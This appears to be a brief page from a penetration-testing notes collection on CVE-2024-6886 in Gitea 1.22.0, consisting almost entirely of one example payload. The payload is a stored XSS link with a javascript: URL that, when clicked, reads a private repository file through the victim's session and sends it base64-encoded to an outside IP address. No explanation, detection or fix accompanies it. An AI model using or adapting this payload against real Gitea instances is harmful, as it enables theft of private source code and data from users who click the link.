Gitea

CVE-2024-6886 - Version: 1.22.0

Documentation

Example Payload

<a href="javascript:var req = new XMLHttpRequest();req.open('GET',
'http://localhost:3000/administrator/Employee-
management/raw/branch/main/index.php', false);req.send();var response =
req.responseText;var req2 = new XMLHttpRequest();req2.open('GET',
'http://10.10.14.91:8000/?content=' + btoa(response),
true);req2.send();">Click</a>

PreviousWeb Services/Frameworks NextWordpress

Last updated 46 minutes ago